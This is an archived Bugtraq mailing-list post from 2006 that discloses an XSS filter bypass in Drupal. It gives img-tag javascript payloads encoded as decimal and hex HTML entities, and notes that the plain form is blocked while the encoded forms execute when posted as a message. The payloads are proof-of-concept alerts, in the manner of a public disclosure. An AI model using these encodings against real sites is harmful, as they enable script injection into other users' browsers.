Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Drupal all versiyon xss cehennem.org
From: liz0 () bsdmail com
Date: 2 Jan 2006 10:45:25 -0000
Drupal all versiyon xss 
----------------------------------------------------
site:http://www.drupal.org

Hex, Base64, Decimal site: http://liz0zim.no-ip.org/code.php
--------------------------------------------------

img tag : on

---------------------------------------------------------------------------------------------------------------------------------------------------------------------

Decimal Value: HTML (without semicolons) 

<img src=javascript:alert('XSS')>  = <img 
src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41>
---------------------------------------------------------------------------------------------------------------------------------------------------------------
Decimal Value: HTML (with semicolons)

<img src=javascript:alert('XSS')>  = <img 
src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


---------------------------------------------------------------------------------------------------------------------------------------------------------------
example:
post message :<img src=javascript:alert('XSS')> not Vulnerable but <img 
src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41> Vulnerable 

post mesage  :<img src=javascript:alert('XSS')> not Vulnerable but <img 
src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 Vulnerable  

  
---------------------------------------------------------

Credit:Liz0ziM
mail:liz0 () bsdmail com
www.biyo.tk , www.cehennem.org

Gretz:wannacut,The_Bekir,Codexploder'tq,furtivo,R00t3rr0r,disconnect,cyberlord and all friend

-----------------------------------------------------------
Source:

http://liz0zim.no-ip.org/drupal.txt

------------------------------------------------------------

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]